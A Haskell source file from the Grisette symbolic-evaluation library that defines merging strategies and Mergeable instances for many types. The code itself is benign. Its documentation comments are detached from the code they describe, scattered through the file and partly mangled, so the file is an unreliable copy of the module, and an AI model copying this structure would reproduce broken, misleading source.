* No strategy
For example,
* the symbolic boolean values can be directly merged with 'ites'.
* the set @{1}@, which is a subset of the values of the type @Integer@,
can be simply merged as the set contains only a single value.
* all the 'Just' values of the type @Maybe SymBool@ can be simply merged
by merging the wrapped symbolic boolean with 'ites'.
indexing function, and the values with the same index will be organized as
Each group (sub-tree) will be further merged with a sub-strategy for the
index.
into sub-trees, and organize them in a sorted way. The sub-trees will further
be merged with the sub-strategies. For example,
sub-strategies.
indexing with 'Data.Maybe.isJust', the 'Nothing' and 'Just' values can then
then be merged with different simple strategies as sub-strategies.
For example, we cannot merge values with function types that returns concrete
lists.
provides a merging strategy.
If the derived version does not work for you, you should determine
if your type can be directly merged with a merging function. If so, you can
If the type cannot be directly merged with a merging function, but could be
partitioned into subsets of values that can be simply merged with a function,
For easier building of the merging strategies, check out the combinators
For more details, please see the documents of the constructors, or refer to
| Simple mergeable strategy.
For symbolic booleans, we can implement its merge strategy as follows:
| Merge function.
| Sorted mergeable strategy.
For @Maybe SymBool@, we can implement its merge strategy as follows:
> (\case; Nothing -> False; Just _ -> True)
> (\idx ->
> then SimpleStrategy $ \_ t _ -> t
> else SimpleStrategy $ \cond (Just l) (Just r) -> Just $ ites cond l r)
| Indexing function
| Sub-strategy function
| For preventing the merging intentionally. This could be
useful for keeping some value concrete and may help generate more efficient
formulas.
details.
| Useful utility function for building merge strategies manually.
For example, to build the merge strategy for the just branch of @Maybe a@,
one could write
| The merge strategy to be wrapped
| The wrap function
| The unwrap function, which does not have to be defined for every value
The root merge strategy should be able to merge every value of the type.
a union.
| The root merging strategy for the type.
@DerivingStrategies@ extension.
| Lift merge strategy through the type constructor.
| Lift the root merge strategy through the unary type constructor.
| Lift merge strategy through the type constructor.
| Lift the root merge strategy through the binary type constructor.
| Lift merge strategy through the type constructor.
| Lift the root merge strategy through the binary type constructor.
# INLINE liftRootStrategy' #
# INLINE liftRootStrategy' #
# INLINE liftRootStrategy' #
# INLINE liftRootStrategy' #
# INLINE liftRootStrategy' #
# INLINE liftRootStrategy' #
# INLINE liftRootStrategy' #
# INLINE liftRootStrategy' #
| Useful utility function for building merge strategies for product types
manually.
For example, to build the merge strategy for the following product type,
one could write
> :: MergingStrategy X
| The wrap function
| The unwrap function, which does not have to be defined for every value
# INLINE product2Strategy #
instances
()
Either
Maybe
| Helper type for building efficient merge strategy for list-like containers.
| Helper function for building efficient merge strategy for list-like containers.
List
(,)
(,,)
(,,,)
(,,,,)
(,,,,,)
(,,,,,,)
(,,,,,,,)
function
MaybeT
ExceptT
state
writer
reader
Sum
Ordering
Identity
IdentityT
ContT
Data.Monoid module
Exceptions | # LANGUAGE CPP #
# LANGUAGE DataKinds #
# LANGUAGE DerivingVia #
# LANGUAGE FlexibleContexts #
# LANGUAGE FlexibleInstances #
# LANGUAGE KindSignatures #
# LANGUAGE LambdaCase #
# LANGUAGE MultiParamTypeClasses #
# LANGUAGE QuantifiedConstraints #
# LANGUAGE ScopedTypeVariables #
# LANGUAGE StandaloneDeriving #
# LANGUAGE Trustworthy #
# LANGUAGE TypeApplications #
# LANGUAGE TypeOperators #
# LANGUAGE UndecidableInstances #
Module : . Core . Data . Class .
Copyright : ( c ) 2021 - 2023
Portability : GHC only
module Grisette.Core.Data.Class.Mergeable
MergingStrategy (..),
*
Mergeable (..),
Mergeable1 (..),
rootStrategy1,
Mergeable2 (..),
rootStrategy2,
Mergeable3 (..),
rootStrategy3,
Mergeable' (..),
derivedRootStrategy,
wrapStrategy,
product2Strategy,
DynamicSortedIdx (..),
StrategyList (..),
buildStrategyList,
resolveStrategy,
resolveStrategy',
)
where
import Control.Exception
import Control.Monad.Cont
import Control.Monad.Except
import Control.Monad.Identity
import qualified Control.Monad.RWS.Lazy as RWSLazy
import qualified Control.Monad.RWS.Strict as RWSStrict
import Control.Monad.Reader
import qualified Control.Monad.State.Lazy as StateLazy
import qualified Control.Monad.State.Strict as StateStrict
import Control.Monad.Trans.Maybe
import qualified Control.Monad.Writer.Lazy as WriterLazy
import qualified Control.Monad.Writer.Strict as WriterStrict
import qualified Data.ByteString as B
import Data.Functor.Classes
import Data.Functor.Sum
import Data.Int
import Data.Kind
import qualified Data.Monoid as Monoid
import Data.Typeable
import Data.Word
import GHC.Natural
import qualified GHC.TypeLits
import GHC.TypeNats
import Generics.Deriving
import Grisette.Core.Data.BV
import Grisette.Core.Data.Class.Bool
import Grisette.IR.SymPrim.Data.Prim.InternedTerm.Term
import Unsafe.Coerce
data DynamicSortedIdx where
DynamicSortedIdx :: forall idx. (Show idx, Ord idx, Typeable idx) => idx -> DynamicSortedIdx
instance Eq DynamicSortedIdx where
(DynamicSortedIdx (a :: a)) == (DynamicSortedIdx (b :: b)) = case eqT @a @b of
Just Refl -> a == b
_ -> False
# INLINE (= =) #
instance Ord DynamicSortedIdx where
compare (DynamicSortedIdx (a :: a)) (DynamicSortedIdx (b :: b)) = case eqT @a @b of
Just Refl -> compare a b
_ -> error "This Ord is incomplete"
# INLINE compare #
instance Show DynamicSortedIdx where
show (DynamicSortedIdx a) = show a
| Resolves the indices and the terminal merge strategy for a value of some ' ' type .
resolveStrategy :: forall x. MergingStrategy x -> x -> ([DynamicSortedIdx], MergingStrategy x)
resolveStrategy s x = resolveStrategy' x s
resolveStrategy' :: forall x. x -> MergingStrategy x -> ([DynamicSortedIdx], MergingStrategy x)
resolveStrategy' x = go
where
go :: MergingStrategy x -> ([DynamicSortedIdx], MergingStrategy x)
go (SortedStrategy idxFun subStrategy) = case go ss of
(idxs, r) -> (DynamicSortedIdx idx : idxs, r)
where
idx = idxFun x
ss = subStrategy idx
go s = ([], s)
In , a merged union ( if - then - else tree ) follows the _ _ /hierarchical/ _ _
given type . We have three types of merging strategies :
The ' SimpleStrategy ' merges values with a simple merge function .
The ' SortedStrategy ' merges values by first grouping the values with an
a sub - tree in the if - then - else structure of ' . Core . Data . UnionBase . UnionBase ' .
The index type should be a totally ordered type ( with the ' '
type class ) . will use the indexing function to partition the values
* all the integers can be merged with ' SortedStrategy ' by indexing with
the identity function and use the ' SimpleStrategy ' shown before as the
* all the @Maybe SymBool@ values can be merged with ' SortedStrategy ' by
The ' ' does not perform any merging .
For , we can automatically derive the ' ' type class , which
implement the merging strategy as a ' SimpleStrategy ' .
you should implement the merging strategy as a ' SortedStrategy ' .
like ` wrapStrategy ` .
[ 's paper]( / files / POPL23.pdf ) .
data MergingStrategy a where
> SimpleStrategy ites : : MergingStrategy SymBool
SimpleStrategy ::
(SymBool -> a -> a -> a) ->
MergingStrategy a
For Integers , we can implement its merge strategy as follows :
> SortedStrategy i d ( \ _ - > SimpleStrategy $ \ _ t _ - > t )
> SortedStrategy
> if idx
SortedStrategy ::
(Ord idx, Typeable idx, Show idx) =>
(a -> idx) ->
(idx -> MergingStrategy a) ->
MergingStrategy a
See [ 's paper]( / files / POPL23.pdf ) for
NoStrategy :: MergingStrategy a
> wrapStrategy Just fromMaybe rootStrategy : : MergingStrategy ( Maybe a )
wrapStrategy ::
MergingStrategy a ->
(a -> b) ->
(b -> a) ->
MergingStrategy b
wrapStrategy (SimpleStrategy m) wrap unwrap =
SimpleStrategy
( \cond ifTrue ifFalse ->
wrap $ m cond (unwrap ifTrue) (unwrap ifFalse)
)
wrapStrategy (SortedStrategy idxFun substrategy) wrap unwrap =
SortedStrategy
(idxFun . unwrap)
(\idx -> wrapStrategy (substrategy idx) wrap unwrap)
wrapStrategy NoStrategy _ _ = NoStrategy
# INLINE wrapStrategy #
| Each type is associated with a root merge strategy given by ' rootStrategy ' .
will use the root merge strategy to merge the values of the type in
_ _ Note 1 : _ _ This type class can be derived for algebraic data types .
You may need the @DerivingVia@ and @DerivingStrategies@ extensions .
> data X = ... deriving Generic deriving via ( Default X )
class Mergeable a where
rootStrategy :: MergingStrategy a
instance (Generic a, Mergeable' (Rep a)) => Mergeable (Default a) where
rootStrategy = unsafeCoerce (derivedRootStrategy :: MergingStrategy a)
# NOINLINE rootStrategy #
| Generic derivation for the ' ' class .
Usually you can derive the merging strategy with the @DerivingVia@ and
> data X = ... deriving ( Generic ) deriving via ( Default X )
derivedRootStrategy :: (Generic a, Mergeable' (Rep a)) => MergingStrategy a
derivedRootStrategy = wrapStrategy rootStrategy' to from
# INLINE derivedRootStrategy #
| Lifting of the ' ' class to unary type constructors .
class Mergeable1 (u :: Type -> Type) where
liftRootStrategy :: MergingStrategy a -> MergingStrategy (u a)
rootStrategy1 :: (Mergeable a, Mergeable1 u) => MergingStrategy (u a)
rootStrategy1 = liftRootStrategy rootStrategy
# INLINE rootStrategy1 #
| Lifting of the ' ' class to binary type constructors .
class Mergeable2 (u :: Type -> Type -> Type) where
liftRootStrategy2 :: MergingStrategy a -> MergingStrategy b -> MergingStrategy (u a b)
rootStrategy2 :: (Mergeable a, Mergeable b, Mergeable2 u) => MergingStrategy (u a b)
rootStrategy2 = liftRootStrategy2 rootStrategy rootStrategy
# INLINE rootStrategy2 #
| Lifting of the ' ' class to ternary type constructors .
class Mergeable3 (u :: Type -> Type -> Type -> Type) where
liftRootStrategy3 :: MergingStrategy a -> MergingStrategy b -> MergingStrategy c -> MergingStrategy (u a b c)
rootStrategy3 :: (Mergeable a, Mergeable b, Mergeable c, Mergeable3 u) => MergingStrategy (u a b c)
rootStrategy3 = liftRootStrategy3 rootStrategy rootStrategy rootStrategy
# INLINE rootStrategy3 #
instance (Generic1 u, Mergeable1' (Rep1 u)) => Mergeable1 (Default1 u) where
liftRootStrategy = unsafeCoerce (derivedLiftMergingStrategy :: MergingStrategy a -> MergingStrategy (u a))
# NOINLINE liftRootStrategy #
class Mergeable1' (u :: Type -> Type) where
liftRootStrategy' :: MergingStrategy a -> MergingStrategy (u a)
instance Mergeable1' U1 where
liftRootStrategy' _ = SimpleStrategy (\_ t _ -> t)
instance Mergeable1' V1 where
liftRootStrategy' _ = SimpleStrategy (\_ t _ -> t)
instance Mergeable1' Par1 where
liftRootStrategy' m = wrapStrategy m Par1 unPar1
instance Mergeable1 f => Mergeable1' (Rec1 f) where
liftRootStrategy' m = wrapStrategy (liftRootStrategy m) Rec1 unRec1
instance Mergeable c => Mergeable1' (K1 i c) where
liftRootStrategy' _ = wrapStrategy rootStrategy K1 unK1
instance Mergeable1' a => Mergeable1' (M1 i c a) where
liftRootStrategy' m = wrapStrategy (liftRootStrategy' m) M1 unM1
instance (Mergeable1' a, Mergeable1' b) => Mergeable1' (a :+: b) where
liftRootStrategy' m =
SortedStrategy
( \case
L1 _ -> False
R1 _ -> True
)
( \idx ->
if not idx
then wrapStrategy (liftRootStrategy' m) L1 (\case (L1 v) -> v; _ -> error "impossible")
else wrapStrategy (liftRootStrategy' m) R1 (\case (R1 v) -> v; _ -> error "impossible")
)
instance (Mergeable1' a, Mergeable1' b) => Mergeable1' (a :*: b) where
liftRootStrategy' m = product2Strategy (:*:) (\(a :*: b) -> (a, b)) (liftRootStrategy' m) (liftRootStrategy' m)
| Generic derivation for the ' ' class .
derivedLiftMergingStrategy :: (Generic1 u, Mergeable1' (Rep1 u)) => MergingStrategy a -> MergingStrategy (u a)
derivedLiftMergingStrategy m = wrapStrategy (liftRootStrategy' m) to1 from1
# INLINE derivedLiftMergingStrategy #
| Auxiliary class for the generic derivation for the ' ' class .
class Mergeable' f where
rootStrategy' :: MergingStrategy (f a)
instance Mergeable' U1 where
rootStrategy' = SimpleStrategy (\_ t _ -> t)
# INLINE rootStrategy ' #
instance Mergeable' V1 where
rootStrategy' = SimpleStrategy (\_ t _ -> t)
# INLINE rootStrategy ' #
instance (Mergeable c) => Mergeable' (K1 i c) where
rootStrategy' = wrapStrategy rootStrategy K1 unK1
# INLINE rootStrategy ' #
instance (Mergeable' a) => Mergeable' (M1 i c a) where
rootStrategy' = wrapStrategy rootStrategy' M1 unM1
# INLINE rootStrategy ' #
instance (Mergeable' a, Mergeable' b) => Mergeable' (a :+: b) where
rootStrategy' =
SortedStrategy
( \case
L1 _ -> False
R1 _ -> True
)
( \idx ->
if not idx
then wrapStrategy rootStrategy' L1 (\case (L1 v) -> v; _ -> undefined)
else wrapStrategy rootStrategy' R1 (\case (R1 v) -> v; _ -> undefined)
)
# INLINE rootStrategy ' #
> data X = X { x1 : : Int , x2 : : }
> product2Strategy X ( \(X a b ) - > ( a , b ) ) rootStrategy rootStrategy
product2Strategy ::
(a -> b -> r) ->
(r -> (a, b)) ->
| The first merge strategy to be wrapped
MergingStrategy a ->
| The second merge strategy to be wrapped
MergingStrategy b ->
MergingStrategy r
product2Strategy wrap unwrap strategy1 strategy2 =
case (strategy1, strategy2) of
(NoStrategy, _) -> NoStrategy
(_, NoStrategy) -> NoStrategy
(SimpleStrategy m1, SimpleStrategy m2) ->
SimpleStrategy $ \cond t f -> case (unwrap t, unwrap f) of
((hdt, tlt), (hdf, tlf)) ->
wrap (m1 cond hdt hdf) (m2 cond tlt tlf)
(s1@(SimpleStrategy _), SortedStrategy idxf subf) ->
SortedStrategy (idxf . snd . unwrap) (product2Strategy wrap unwrap s1 . subf)
(SortedStrategy idxf subf, s2) ->
SortedStrategy (idxf . fst . unwrap) (\idx -> product2Strategy wrap unwrap (subf idx) s2)
instance (Mergeable' a, Mergeable' b) => Mergeable' (a :*: b) where
rootStrategy' = product2Strategy (:*:) (\(a :*: b) -> (a, b)) rootStrategy' rootStrategy'
# INLINE rootStrategy ' #
#define CONCRETE_ORD_MERGEABLE(type) \
instance Mergeable type where \
rootStrategy = \
let sub = SimpleStrategy $ \_ t _ -> t \
in SortedStrategy id $ const sub
#define CONCRETE_ORD_MERGEABLE_BV(type) \
instance (KnownNat n, 1 <= n) => Mergeable (type n) where \
rootStrategy = \
let sub = SimpleStrategy $ \_ t _ -> t \
in SortedStrategy id $ const sub
#if 1
CONCRETE_ORD_MERGEABLE(Bool)
CONCRETE_ORD_MERGEABLE(Integer)
CONCRETE_ORD_MERGEABLE(Char)
CONCRETE_ORD_MERGEABLE(Int)
CONCRETE_ORD_MERGEABLE(Int8)
CONCRETE_ORD_MERGEABLE(Int16)
CONCRETE_ORD_MERGEABLE(Int32)
CONCRETE_ORD_MERGEABLE(Int64)
CONCRETE_ORD_MERGEABLE(Word)
CONCRETE_ORD_MERGEABLE(Word8)
CONCRETE_ORD_MERGEABLE(Word16)
CONCRETE_ORD_MERGEABLE(Word32)
CONCRETE_ORD_MERGEABLE(Word64)
CONCRETE_ORD_MERGEABLE(B.ByteString)
CONCRETE_ORD_MERGEABLE_BV(WordN)
CONCRETE_ORD_MERGEABLE_BV(IntN)
#endif
instance Mergeable SomeIntN where
rootStrategy =
SortedStrategy @Natural
(\(SomeIntN (v :: IntN n)) -> natVal (Proxy @n))
( \n ->
SortedStrategy @Integer
(\(SomeIntN (IntN i)) -> toInteger i)
(const $ SimpleStrategy $ \_ l _ -> l)
)
instance Mergeable SomeWordN where
rootStrategy =
SortedStrategy @Natural
(\(SomeWordN (v :: WordN n)) -> natVal (Proxy @n))
( \n ->
SortedStrategy @Integer
(\(SomeWordN (WordN i)) -> toInteger i)
(const $ SimpleStrategy $ \_ l _ -> l)
)
deriving via (Default ()) instance Mergeable ()
deriving via (Default (Either e a)) instance (Mergeable e, Mergeable a) => Mergeable (Either e a)
deriving via (Default1 (Either e)) instance (Mergeable e) => Mergeable1 (Either e)
instance Mergeable2 Either where
liftRootStrategy2 m1 m2 =
SortedStrategy
( \case
Left _ -> False
Right _ -> True
)
( \case
False -> wrapStrategy m1 Left (\case (Left v) -> v; _ -> undefined)
True -> wrapStrategy m2 Right (\case (Right v) -> v; _ -> undefined)
)
# INLINE liftRootStrategy2 #
deriving via (Default (Maybe a)) instance (Mergeable a) => Mergeable (Maybe a)
deriving via (Default1 Maybe) instance Mergeable1 Maybe
data StrategyList container where
StrategyList ::
forall bool a container.
container [DynamicSortedIdx] ->
container (MergingStrategy a) ->
StrategyList container
buildStrategyList ::
forall bool a container.
(Functor container) =>
MergingStrategy a ->
container a ->
StrategyList container
buildStrategyList s l = StrategyList idxs strategies
where
r = resolveStrategy s <$> l
idxs = fst <$> r
strategies = snd <$> r
# INLINE buildStrategyList #
instance Eq1 container => Eq (StrategyList container) where
(StrategyList idxs1 _) == (StrategyList idxs2 _) = eq1 idxs1 idxs2
# INLINE (= =) #
instance Ord1 container => Ord (StrategyList container) where
compare (StrategyList idxs1 _) (StrategyList idxs2 _) = compare1 idxs1 idxs2
# INLINE compare #
instance Show1 container => Show (StrategyList container) where
showsPrec i (StrategyList idxs1 _) = showsPrec1 i idxs1
instance (Mergeable a) => Mergeable [a] where
rootStrategy = case rootStrategy :: MergingStrategy a of
SimpleStrategy m ->
SortedStrategy length $ \_ ->
SimpleStrategy $ \cond -> zipWith (m cond)
NoStrategy ->
SortedStrategy length $ const NoStrategy
_ -> SortedStrategy length $ \_ ->
SortedStrategy (buildStrategyList rootStrategy) $ \(StrategyList _ strategies) ->
let s :: [MergingStrategy a] = unsafeCoerce strategies
allSimple = all (\case SimpleStrategy _ -> True; _ -> False) s
in if allSimple
then SimpleStrategy $ \cond l r ->
(\case (SimpleStrategy f, l1, r1) -> f cond l1 r1; _ -> error "impossible") <$> zip3 s l r
else NoStrategy
# INLINE rootStrategy #
instance Mergeable1 [] where
liftRootStrategy (ms :: MergingStrategy a) = case ms of
SimpleStrategy m ->
SortedStrategy length $ \_ ->
SimpleStrategy $ \cond -> zipWith (m cond)
NoStrategy ->
SortedStrategy length $ const NoStrategy
_ -> SortedStrategy length $ \_ ->
SortedStrategy (buildStrategyList ms) $ \(StrategyList _ strategies) ->
let s :: [MergingStrategy a] = unsafeCoerce strategies
allSimple = all (\case SimpleStrategy _ -> True; _ -> False) s
in if allSimple
then SimpleStrategy $ \cond l r ->
(\case (SimpleStrategy f, l1, r1) -> f cond l1 r1; _ -> error "impossible") <$> zip3 s l r
else NoStrategy
# INLINE liftRootStrategy #
deriving via (Default (a, b)) instance (Mergeable a, Mergeable b) => Mergeable (a, b)
deriving via (Default1 ((,) a)) instance (Mergeable a) => Mergeable1 ((,) a)
instance Mergeable2 (,) where
liftRootStrategy2 = product2Strategy (,) id
# INLINE liftRootStrategy2 #
deriving via
(Default (a, b, c))
instance
(Mergeable a, Mergeable b, Mergeable c) => Mergeable (a, b, c)
deriving via
(Default1 ((,,) a b))
instance
(Mergeable a, Mergeable b) => Mergeable1 ((,,) a b)
instance (Mergeable a) => Mergeable2 ((,,) a) where
liftRootStrategy2 = liftRootStrategy3 rootStrategy
# INLINE liftRootStrategy2 #
instance Mergeable3 (,,) where
liftRootStrategy3 m1 m2 m3 =
product2Strategy
(\a (b, c) -> (a, b, c))
(\(a, b, c) -> (a, (b, c)))
m1
(liftRootStrategy2 m2 m3)
# INLINE liftRootStrategy3 #
deriving via
(Default (a, b, c, d))
instance
(Mergeable a, Mergeable b, Mergeable c, Mergeable d) =>
Mergeable (a, b, c, d)
deriving via
(Default1 ((,,,) a b c))
instance
(Mergeable a, Mergeable b, Mergeable c) =>
Mergeable1 ((,,,) a b c)
deriving via
(Default (a, b, c, d, e))
instance
(Mergeable a, Mergeable b, Mergeable c, Mergeable d, Mergeable e) =>
Mergeable (a, b, c, d, e)
deriving via
(Default1 ((,,,,) a b c d))
instance
(Mergeable a, Mergeable b, Mergeable c, Mergeable d) =>
Mergeable1 ((,,,,) a b c d)
deriving via
(Default (a, b, c, d, e, f))
instance
( Mergeable a,
Mergeable b,
Mergeable c,
Mergeable d,
Mergeable e,
Mergeable f
) =>
Mergeable (a, b, c, d, e, f)
deriving via
(Default1 ((,,,,,) a b c d e))
instance
(Mergeable a, Mergeable b, Mergeable c, Mergeable d, Mergeable e) =>
Mergeable1 ((,,,,,) a b c d e)
deriving via
(Default (a, b, c, d, e, f, g))
instance
( Mergeable a,
Mergeable b,
Mergeable c,
Mergeable d,
Mergeable e,
Mergeable f,
Mergeable g
) =>
Mergeable (a, b, c, d, e, f, g)
deriving via
(Default1 ((,,,,,,) a b c d e f))
instance
( Mergeable a,
Mergeable b,
Mergeable c,
Mergeable d,
Mergeable e,
Mergeable f
) =>
Mergeable1 ((,,,,,,) a b c d e f)
deriving via
(Default (a, b, c, d, e, f, g, h))
instance
( Mergeable a,
Mergeable b,
Mergeable c,
Mergeable d,
Mergeable e,
Mergeable f,
Mergeable g,
Mergeable h
) =>
Mergeable (a, b, c, d, e, f, g, h)
deriving via
(Default1 ((,,,,,,,) a b c d e f g))
instance
( Mergeable a,
Mergeable b,
Mergeable c,
Mergeable d,
Mergeable e,
Mergeable f,
Mergeable g
) =>
Mergeable1 ((,,,,,,,) a b c d e f g)
instance (Mergeable b) => Mergeable (a -> b) where
rootStrategy = case rootStrategy @b of
SimpleStrategy m -> SimpleStrategy $ \cond t f v -> m cond (t v) (f v)
_ -> NoStrategy
# INLINE rootStrategy #
instance Mergeable1 ((->) a) where
liftRootStrategy ms = case ms of
SimpleStrategy m -> SimpleStrategy $ \cond t f v -> m cond (t v) (f v)
_ -> NoStrategy
# INLINE liftRootStrategy #
instance (Mergeable1 m, Mergeable a) => Mergeable (MaybeT m a) where
rootStrategy = wrapStrategy rootStrategy1 MaybeT runMaybeT
# INLINE rootStrategy #
instance (Mergeable1 m) => Mergeable1 (MaybeT m) where
liftRootStrategy m = wrapStrategy (liftRootStrategy (liftRootStrategy m)) MaybeT runMaybeT
# INLINE liftRootStrategy #
instance
(Mergeable1 m, Mergeable e, Mergeable a) =>
Mergeable (ExceptT e m a)
where
rootStrategy = wrapStrategy rootStrategy1 ExceptT runExceptT
# INLINE rootStrategy #
instance (Mergeable1 m, Mergeable e) => Mergeable1 (ExceptT e m) where
liftRootStrategy m = wrapStrategy (liftRootStrategy (liftRootStrategy m)) ExceptT runExceptT
# INLINE liftRootStrategy #
instance
(Mergeable s, Mergeable a, Mergeable1 m) =>
Mergeable (StateLazy.StateT s m a)
where
rootStrategy = wrapStrategy (liftRootStrategy rootStrategy1) StateLazy.StateT StateLazy.runStateT
# INLINE rootStrategy #
instance (Mergeable s, Mergeable1 m) => Mergeable1 (StateLazy.StateT s m) where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy (liftRootStrategy2 m rootStrategy)))
StateLazy.StateT
StateLazy.runStateT
# INLINE liftRootStrategy #
instance
(Mergeable s, Mergeable a, Mergeable1 m) =>
Mergeable (StateStrict.StateT s m a)
where
rootStrategy =
wrapStrategy (liftRootStrategy rootStrategy1) StateStrict.StateT StateStrict.runStateT
# INLINE rootStrategy #
instance (Mergeable s, Mergeable1 m) => Mergeable1 (StateStrict.StateT s m) where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy (liftRootStrategy2 m rootStrategy)))
StateStrict.StateT
StateStrict.runStateT
# INLINE liftRootStrategy #
instance
(Mergeable s, Mergeable a, Mergeable1 m) =>
Mergeable (WriterLazy.WriterT s m a)
where
rootStrategy = wrapStrategy (liftRootStrategy rootStrategy1) WriterLazy.WriterT WriterLazy.runWriterT
# INLINE rootStrategy #
instance (Mergeable s, Mergeable1 m) => Mergeable1 (WriterLazy.WriterT s m) where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy2 m rootStrategy))
WriterLazy.WriterT
WriterLazy.runWriterT
# INLINE liftRootStrategy #
instance
(Mergeable s, Mergeable a, Mergeable1 m) =>
Mergeable (WriterStrict.WriterT s m a)
where
rootStrategy = wrapStrategy (liftRootStrategy rootStrategy1) WriterStrict.WriterT WriterStrict.runWriterT
# INLINE rootStrategy #
instance (Mergeable s, Mergeable1 m) => Mergeable1 (WriterStrict.WriterT s m) where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy2 m rootStrategy))
WriterStrict.WriterT
WriterStrict.runWriterT
# INLINE liftRootStrategy #
instance
(Mergeable a, Mergeable1 m) =>
Mergeable (ReaderT s m a)
where
rootStrategy = wrapStrategy (liftRootStrategy rootStrategy1) ReaderT runReaderT
# INLINE rootStrategy #
instance (Mergeable1 m) => Mergeable1 (ReaderT s m) where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy m))
ReaderT
runReaderT
# INLINE liftRootStrategy #
instance
(Mergeable1 l, Mergeable1 r, Mergeable x) =>
Mergeable (Sum l r x)
where
rootStrategy =
SortedStrategy
( \case
InL _ -> False
InR _ -> True
)
( \case
False -> wrapStrategy rootStrategy1 InL (\case (InL v) -> v; _ -> error "impossible")
True -> wrapStrategy rootStrategy1 InR (\case (InR v) -> v; _ -> error "impossible")
)
# INLINE rootStrategy #
instance (Mergeable1 l, Mergeable1 r) => Mergeable1 (Sum l r) where
liftRootStrategy m =
SortedStrategy
( \case
InL _ -> False
InR _ -> True
)
( \case
False -> wrapStrategy (liftRootStrategy m) InL (\case (InL v) -> v; _ -> error "impossible")
True -> wrapStrategy (liftRootStrategy m) InR (\case (InR v) -> v; _ -> error "impossible")
)
# INLINE liftRootStrategy #
deriving via
(Default Ordering)
instance
Mergeable Ordering
Generic
deriving via
(Default (U1 x))
instance
Mergeable (U1 x)
deriving via
(Default (V1 x))
instance
Mergeable (V1 x)
deriving via
(Default (K1 i c x))
instance
(Mergeable c) => Mergeable (K1 i c x)
deriving via
(Default (M1 i c a x))
instance
(Mergeable (a x)) => Mergeable (M1 i c a x)
deriving via
(Default ((a :+: b) x))
instance
(Mergeable (a x), Mergeable (b x)) => Mergeable ((a :+: b) x)
deriving via
(Default ((a :*: b) x))
instance
(Mergeable (a x), Mergeable (b x)) => Mergeable ((a :*: b) x)
instance (Mergeable a) => Mergeable (Identity a) where
rootStrategy = wrapStrategy rootStrategy Identity runIdentity
# INLINE rootStrategy #
instance Mergeable1 Identity where
liftRootStrategy m = wrapStrategy m Identity runIdentity
# INLINE liftRootStrategy #
instance (Mergeable1 m, Mergeable a) => Mergeable (IdentityT m a) where
rootStrategy = wrapStrategy rootStrategy1 IdentityT runIdentityT
# INLINE rootStrategy #
instance (Mergeable1 m) => Mergeable1 (IdentityT m) where
liftRootStrategy m = wrapStrategy (liftRootStrategy m) IdentityT runIdentityT
# INLINE liftRootStrategy #
instance (Mergeable1 m, Mergeable r) => Mergeable (ContT r m a) where
rootStrategy =
wrapStrategy
(liftRootStrategy rootStrategy1)
ContT
(\(ContT v) -> v)
# INLINE rootStrategy #
instance (Mergeable1 m, Mergeable r) => Mergeable1 (ContT r m) where
liftRootStrategy _ =
wrapStrategy
(liftRootStrategy rootStrategy1)
ContT
(\(ContT v) -> v)
# INLINE liftRootStrategy #
RWS
instance
(Mergeable s, Mergeable w, Mergeable a, Mergeable1 m) =>
Mergeable (RWSLazy.RWST r w s m a)
where
rootStrategy = wrapStrategy (liftRootStrategy (liftRootStrategy rootStrategy1)) RWSLazy.RWST (\(RWSLazy.RWST m) -> m)
# INLINE rootStrategy #
instance
(Mergeable s, Mergeable w, Mergeable1 m) =>
Mergeable1 (RWSLazy.RWST r w s m)
where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy (liftRootStrategy (liftRootStrategy3 m rootStrategy rootStrategy))))
RWSLazy.RWST
(\(RWSLazy.RWST rws) -> rws)
# INLINE liftRootStrategy #
instance
(Mergeable s, Mergeable w, Mergeable a, Mergeable1 m) =>
Mergeable (RWSStrict.RWST r w s m a)
where
rootStrategy = wrapStrategy (liftRootStrategy (liftRootStrategy rootStrategy1)) RWSStrict.RWST (\(RWSStrict.RWST m) -> m)
# INLINE rootStrategy #
instance
(Mergeable s, Mergeable w, Mergeable1 m) =>
Mergeable1 (RWSStrict.RWST r w s m)
where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy (liftRootStrategy (liftRootStrategy3 m rootStrategy rootStrategy))))
RWSStrict.RWST
(\(RWSStrict.RWST rws) -> rws)
# INLINE liftRootStrategy #
deriving via
(Default (Monoid.Sum a))
instance
(Mergeable a) => Mergeable (Monoid.Sum a)
deriving via (Default1 Monoid.Sum) instance Mergeable1 Monoid.Sum
-- CPP templates stamping out Mergeable instances whose merge is the plain
-- symbolic if-then-else ('ites'); one macro per instance-head shape.
-- Plain symbolic type (no type parameters).
#define MERGEABLE_SIMPLE(symtype) \
instance Mergeable symtype where \
rootStrategy = SimpleStrategy ites
-- Sized bit-vector, indexed by a non-zero width @n@.
#define MERGEABLE_BV(symtype) \
instance (KnownNat n, 1 <= n) => Mergeable (symtype n) where \
rootStrategy = SimpleStrategy ites
-- Existentially-sized ("some") bit-vector wrapper.
#define MERGEABLE_BV_SOME(symtype) \
instance Mergeable symtype where \
rootStrategy = SimpleStrategy ites
-- Symbolic function type, given linked concrete/symbolic representations.
#define MERGEABLE_FUN(op) \
instance (SupportedPrim ca, SupportedPrim cb, LinkedRep ca sa, LinkedRep cb sb) => Mergeable (sa op sb) where \
rootStrategy = SimpleStrategy ites
-- NOTE(review): the #if 1 block appears to exist only so CPP expands the
-- macro invocations below — confirm against the original source.
#if 1
MERGEABLE_SIMPLE(SymBool)
MERGEABLE_SIMPLE(SymInteger)
MERGEABLE_BV(SymIntN)
MERGEABLE_BV(SymWordN)
MERGEABLE_BV_SOME(SomeSymIntN)
MERGEABLE_BV_SOME(SomeSymWordN)
MERGEABLE_FUN(=~>)
MERGEABLE_FUN(-~>)
#endif
-- | Merge 'ArithException' values: values are first grouped by constructor
-- (via the total index function below); two exceptions with the same
-- constructor merge by keeping the left-hand value.
instance Mergeable ArithException where
  rootStrategy = SortedStrategy constructorIndex (const keepLeft)
    where
      -- Stable ordering key, one slot per constructor.
      constructorIndex :: ArithException -> Int
      constructorIndex Overflow = 0
      constructorIndex Underflow = 1
      constructorIndex LossOfPrecision = 2
      constructorIndex DivideByZero = 3
      constructorIndex Denormal = 4
      constructorIndex RatioZeroDenominator = 5
      -- Within a group the merged value is simply the left operand.
      keepLeft = SimpleStrategy $ \_ l _ -> l
